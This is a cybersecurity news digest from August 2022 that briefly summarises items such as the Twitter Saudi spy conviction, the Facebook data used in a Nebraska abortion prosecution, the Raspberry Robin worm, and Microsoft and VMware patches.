Cyber Security Headlines: Chinese kids defrauded, Twitter Saudi spy, Facebook abortion court order

Chinese fraudsters target kids playing online games

Chinese scammers are targeting children playing online games with fraudulent promises, including circumventing the nation’s 3-hour-per-week gaming limit. The fraudsters are friending victims using messaging platforms such as WeChat, then soliciting payments in exchange for extra gaming time, free gaming skins and free gaming equipment. China’s cyberspace administration (CAC) detailed cases highlighting that victims typically utilized their parents’ phones to make payments from $560 up to as much as $1,850. The CAC disclosed that, so far this year, it has handled 12,000 acts of online fraud perpetrated against minors.

(The Register)

Former Twitter employee convicted in Saudi spy case

On Tuesday, a former Twitter employee was convicted of spying for Saudi Arabia.  Ahmad Abouammo, a US resident born in Egypt, maintained that he was simply promoting the social media platform in the Middle East and North Africa. However, the jury was shown that Abouammo received a Hublot watch and $300,000 in wire transfers in exchange for confidential Twitter account information on Saudi dissidents who criticized the Kingdom and its royal family. The bribes came from a top aide to Mohammaed bin Salman, the now de-facto ruler of Saudi Arabia. Abouammo was found guilty of acting as an agent for Saudi Arabia, money laundering, conspiracy to commit wire fraud and falsifying records. He now faces 10 to 20 years in prison. 

(Bloomberg)

Facebook divulges data leading to abortion prosecution

A 17-year-old girl and her mother have been charged with a series of felonies and misdemeanors after an apparent at home abortion in Nebraska. The state’s case leveraged the teenager’s private Facebook messages, obtained directly from Facebook by court order. The messages allegedly show the mother and daughter purchased medication called Pregnot online to induce the abortion. Jessica Burgess was charged with three felonies including performing an abortion later than the state’s 20-week post fertilization abortion ban which remains unchanged after the controversial reversal of Roe versus Wade. Both women were arrested and held on a $10,000 bond, but jail records indicate they’ve been released.

(VICE)

New Jersey requires threat assessment teams for all school districts

According to a newly signed law, New Jersey school districts, charter schools and renaissance schools will need to establish threat assessment teams in time for the 2023/2024 school year. Threat assessment teams will provide teachers, administrators, and other staff with assistance identifying students at risk for engaging in violence or other harmful activities, and delivering risk management strategies. The teams will include a school psychologist or other student counselor, a teacher, senior administrator, and a safety resource who will serve as a liaison to law enforcement. State officials highlight that the aim is to focus on preventative measures to avert dangerous incidents from occurring.

(Security Magazine)

Thanks to today’s episode sponsor, Edgescan

Edgescan combines full-stack coverage with integrated reporting and business-level prioritization to deliver a single source of truth for your entire vulnerability management program with zero false positives.

Highly evasive worm spreads over external disks

Cisco researchers have uncovered a pattern of msiexec.exe usage across different endpoints that they’ve traced back to recently discovered malware called Raspberry Robin. Raspberry Robin is a worm that spreads through infected external drives and uses an excessive amount of non-printable characters and changing letter case to avoid string matching techniques. The payload is downloaded from QNAP cloud accounts and then establishes a command and control (C2) channel through TOR connections. Cisco researchers recommend monitoring for Indicators of Compromise (IOCs) which they have published in their blog.

(Cisco)

You should probably patch that

Microsoft’s August 2022 Patch Tuesday includes fixes for the actively exploited ‘DogWalk’ zero-day vulnerability, tracked as CVE-2022-34713. It’s a flaw in Microsoft Windows Support Diagnostic Tool (MSDT) allowing for remote code execution (RCE). Yesterday’s update addresses a total of 121 flaws, seventeen of which are classified as ‘Critical’ as they allow remote code execution or elevation of privileges.

Additionally, VMware has issued a fix to address a critical authentication bypass vulnerability that has publicly available exploit code. The bug, tagged as CVE-2022-31656, affects VMware Workspace ONE Access, Identity Manager, and vRealize Automation.

(Bleeping Computer [1][2] )

Danish Slurpee supply threatened by cyberattack

On Monday, 7-Eleven stores in Denmark were forced to shut down after a cyberattack disrupted store payment and checkout systems throughout the country. The company issued a statement on Facebook, which read, “Unfortunately, we suspect that we have been exposed to a hacker attack today, Monday 8 August 2022. This means that we cannot use checkouts and/or receive payment. We are therefore keeping the stores closed until we know the extent.” The nature of the attack has not yet been disclosed, but we can only hope that Danes are not deprived of brain freeze for too much longer.

(IT Security Guru)

Scientists use ink to hide encrypted version of classic novel

Scientists from the University of Texas at Austin sent a ground-breaking letter to colleagues in Massachusetts. The letter was penned in special ink which concealed a very special hidden message; an encrypted text file of L. Frank Baum’s classic novel The Wonderful Wizard of Oz, as well as a copy of the key to decrypt it. The ink was laced with synthetic polymers which the scientists used to store the data. DNA has long been considered a front-runner for storage due to a single gram having the ability to store 1 billion terabytes (1 zettabyte) of data. However scientists have sought a non-biological alternative. Co-author of UT’s research, Eric Anslyn, said the breakthrough represents “a revolutionary scientific advance in the area of molecular data storage and cryptography.”

(Ars Technica)

Sean Kelly
Sean Kelly is a cyber risk professional and leader who thrives on learning, collaborating and helping the business securely advance its mission. Sean is also a musician and outdoor enthusiast who loves spending time with his family and two cats.